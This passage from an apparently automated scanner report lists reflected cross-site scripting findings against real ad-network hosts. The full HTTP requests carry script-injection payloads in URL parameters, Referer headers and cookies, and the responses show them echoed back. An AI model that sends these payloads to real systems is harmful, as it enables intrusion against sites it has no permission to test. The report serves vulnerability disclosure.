P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Pragma: no-cache
Server: lighttpd/1.4.21
Set-Cookie: __tuid=2298699369738581740; expires=Sat, 09-Apr-2016 17:41:22 GMT; path=/; domain=.adblade.com
Set-Cookie: __impt=1302543682.054165088407; expires=Tue, 12-Apr-2011 17:41:22 GMT; path=/
X-Powered-By: PHP/5.2.8
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Content-Length: 14928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
t%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,&e7246"><script>alert(1)</script>f269b65bb7d=1http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=14694&fc_app_id=3993" target="_blank">
...[SNIP]...

1.147. http://y.cdn.adblade.com/imps.php [tpUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://y.cdn.adblade.com
Path:   /imps.php

Issue detail

The value of the tpUrl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70367"><script>alert(1)</script>fea2373bb9f was submitted in the tpUrl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,70367"><script>alert(1)</script>fea2373bb9f HTTP/1.1
Host: y.cdn.adblade.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAzczMzMzM5D.NzMzMzMzkPwAAAAAAAAAAAACAwd-20z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABqMpwLvyHsCa7x.O.NrHwpEVGlz2pya-BtpgD9AAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,Z%3D300x250%26s%3D1209091%26_salt%3D2946263302%26B%3D10%26r%3D0,e860ecda-6462-11e0-9f69-003048d6d894
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-type: text/html
Date: Mon, 11 Apr 2011 17:41:21 GMT
Expires: Mon, 11 Apr 2011 17:41:21 GMT
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Pragma: no-cache
Server: lighttpd/1.4.26
Set-Cookie: __tuid=2298699369259597370; expires=Sat, 09-Apr-2016 17:41:21 GMT; path=/; domain=.adblade.com
Set-Cookie: __impt=1302543681.832680212853; expires=Tue, 12-Apr-2011 17:41:21 GMT; path=/
X-Powered-By: PHP/5.2.8
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Content-Length: 14901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,70367"><script>alert(1)</script>fea2373bb9fhttp://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=14694&fc_app_id=3993" target="_blank">
...[SNIP]...

1.148. http://adserving.cpxinteractive.com/st [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b5bb'-alert(1)-'7b2cca80406 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=728x90&section=1836970&referrer=http://www.foxnews.com/politics/index.html HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=6b5bb'-alert(1)-'7b2cca80406

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 17:02:16 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:02:16 GMT
Content-Length: 425

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=728x90&inv_code=1836970&referrer=http://www.google.com/search%3Fhl=en%26q=6b5bb'-alert(1)-'7b2cca80406&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D728x90%26section%3D1836970%26referrer%3Dhttp%3A%2F%2Fwww.foxnews.com%2Fpolitics%2F
...[SNIP]...

1.149. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6e43"-alert(1)-"154bb4aae5d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=140&pubId=5079&campId=3993 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=d6e43"-alert(1)-"154bb4aae5d
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:41:24 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FA2CE391FB899591A7EDF0BA5B76934F; Path=/
Connection: keep-alive
Content-Length: 8305


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://www.google.com/search?hl=en&q=d6e43"-alert(1)-"154bb4aae5d",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=5079&campId=3993",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.de
...[SNIP]...

1.150. http://bh.contextweb.com/bh/sync/admeld [V cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/sync/admeld

Issue detail

The value of the V cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be1f9'-alert(1)-'3ba314679b8 was submitted in the V cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bh/sync/admeld?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.97552ab6-5d98-11e0-8434-0025900a8ffe.1|535039.bf0d68cb-2449-4e5d-8b20-461d8ec850c3.0|535461.4608069584519221037.1|531292.CG-00000001131071922.1; C2W4=3x1f-Ps9Yhy3ydw-2vbkHY4Vj-8mDoMxIgKRGAlDwhIQOU6J7b35caw; cr=111|5|-8588990505152210454|1; V=wOEFmQuIafISbe1f9'-alert(1)-'3ba314679b8

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
Set-Cookie: V=wOEFmQuIafISbe1f9'-alert(1)-'3ba314679b8; Domain=.contextweb.com; Expires=Thu, 05-Apr-2012 16:31:51 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 218
Date: Mon, 11 Apr 2011 16:31:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=8&external_user_id=wOEFmQuIafISbe1f9'-alert(1)-'3ba314679b8&_segment=2%7CwOEFmQuIafISbe1f9'-alert(1)-'3ba314679b8%7C"/>
...[SNIP]...

1.151. http://k.collective-media.net/cmadj/cm.foxnews/tier2_031010 [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.foxnews/tier2_031010

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a52cd"%3balert(1)//cff7d8c4d5c was submitted in the cli cookie. This input was echoed as a52cd";alert(1)//cff7d8c4d5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.foxnews/tier2_031010;sz=300x250;net=cm;ord=1302538878;env=ifr;ord1=280882;cmpgurl=? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f3c48b4c0582ba52cd"%3balert(1)//cff7d8c4d5c; JY57=3cSilT0yz8Xh8jOg0fJAMcgeFnMmtGSsZeOSn2prstLRXgYh65wKGKA; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:21:21 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 12-Apr-2011 16:21:21 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 12-Apr-2011 16:21:21 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Mon, 18-Apr-2011 16:21:21 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 12-Apr-2011 00:21:21 GMT
Content-Length: 8007

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11f3c48b4c0582ba52cd";alert(1)//cff7d8c4d5c&seg_code=noseg&ord=1302538881",true);CollectiveMedia.addPixel("http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif",false);CollectiveMedia.addPixel("http://r.nexac.com/e/getdata.xgi?dt=br&pkey=xkeii
...[SNIP]...

1.152. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/300x250/politics-bottom

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c259c"><script>alert(1)</script>70b3c2b66bd was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/300x250/politics-bottom?t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024ec259c"><script>alert(1)</script>70b3c2b66bd

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICA0NDAxNjgzLCAgbmV0d29yazogICAgICAidHVybiIsICBzaXplOiAgICAgICAgICIzMDB4MjUwIiwgIGZyZXE6ICAgICAgICAgIjEtMiIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiOGQ2MmMzZTEtY2E3Mi00MTQ2LTljYWYtZDM5Y2FiM2Q2OGI0IiwgIHVzZXI6ICAgICAgICAgImUzNmEyZjIwLTk5ODUtNGRjZC04MmU5LTZmZjAzMTJlMDI0ZWMyNTljIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+NzBiM2MyYjY2YmQiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInBvbGl0aWNzLWJvdHRvbSIsICBkaXY6ICAgICAgICAgICI4ZDYyYzNlMS1jYTcyLTQxNDYtOWNhZi1kMzljYWIzZDY4YjQiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5mb3huZXdzLmNvbS9wb2xpdGljcy9pbmRleC5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMSwgIG5ldHdvcmtfaWQ6ICAgMjQsICBhY2NvdW50X2lkOiAgIDU0LCAgbmV0d29ya19uYW1lOiAiVHVybiIsICBwdWJsaXNoZXJfbmFtZTogImZveG5ld3MiLCAgZWNwbTogICAgICAgICAiMS4zNyIsICBmZWNwbTogICAgICAgICIxLjM3IiwgIGZpbGw6ICAgICAgICAgIjEzLjYzIiwgIHBsYWNlbWVudDogICAgInBvbGl0aWNzLWJvdHRvbSIsICBydWxlOiAgICAgICAgICJwb2xpdGljcy1ib3R0b20iLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW3sibmV0d29ya19uYW1lIjoiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2MzA0OSwgImJ1eSI6MTc2LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1lZGlhTWF0aCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjE5NzE4MSwgImJ1eSI6NTAzLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1YmVtb2d1bCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjU4OTU4MDgsICJidXkiOjg0NzEsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHVybiAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjYyODk3LCAiYnV5IjoxODksImxwIjoiaHR0cDovL3d3dy5ob21lZGVwb3QuY29tLyIsImFuIjoiSG9tZSBEZXBvdCIsInN0YXR1cyI6IjAuODkiLCJmaWQiOjQ4OTIsICJmY3BtIjoiMS43NSJ9LHsibmV0d29ya19uYW1lIjoiRGF0YVh1IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NjI5NzksICJidXkiOjE5OSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzEifQ==
Content-Length: 2010
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:27 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024ec259c"><script>alert(1)</script>70b3c2b66bd&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.153. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/300x250/politics-bottom

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25824"><script>alert(1)</script>9bc617e1123 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/300x250/politics-bottom?t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e25824"><script>alert(1)</script>9bc617e1123

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICA0NDAxNjgzLCAgbmV0d29yazogICAgICAidHVybiIsICBzaXplOiAgICAgICAgICIzMDB4MjUwIiwgIGZyZXE6ICAgICAgICAgIjEtMiIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiZjAxZTAzMGYtZjAxNi00YTQ3LTg2NjQtMzlhOGE5NDhiOTBkIiwgIHVzZXI6ICAgICAgICAgImUzNmEyZjIwLTk5ODUtNGRjZC04MmU5LTZmZjAzMTJlMDI0ZTI1ODI0Ij48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+OWJjNjE3ZTExMjMiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInBvbGl0aWNzLWJvdHRvbSIsICBkaXY6ICAgICAgICAgICJmMDFlMDMwZi1mMDE2LTRhNDctODY2NC0zOWE4YTk0OGI5MGQiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5mb3huZXdzLmNvbS9wb2xpdGljcy9pbmRleC5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMSwgIG5ldHdvcmtfaWQ6ICAgMjQsICBhY2NvdW50X2lkOiAgIDU0LCAgbmV0d29ya19uYW1lOiAiVHVybiIsICBwdWJsaXNoZXJfbmFtZTogImZveG5ld3MiLCAgZWNwbTogICAgICAgICAiMS4zNyIsICBmZWNwbTogICAgICAgICIxLjM3IiwgIGZpbGw6ICAgICAgICAgIjEzLjYzIiwgIHBsYWNlbWVudDogICAgInBvbGl0aWNzLWJvdHRvbSIsICBydWxlOiAgICAgICAgICJwb2xpdGljcy1ib3R0b20iLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW3sibmV0d29ya19uYW1lIjoiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2MzA0OSwgImJ1eSI6MTc2LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1lZGlhTWF0aCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjE5NzE4MSwgImJ1eSI6NTAzLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1YmVtb2d1bCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjU4OTU4MDgsICJidXkiOjg0NzEsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHVybiAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjYyODk3LCAiYnV5IjoxODksImxwIjoiaHR0cDovL3d3dy5saHcuY29tLyIsImFuIjoiTGVhZGluZyBIb3RlbHMgb2YgdGhlIFdvcmxkIiwic3RhdHVzIjoiMC4wNCIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJEYXRhWHUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2Mjk3OSwgImJ1eSI6MTk5LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICIiLCAgaG9zdDogICAgICAgICAibmotdGFnNDgifQ==
Content-Length: 2010
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:26 GMT
Connection: close

<html>
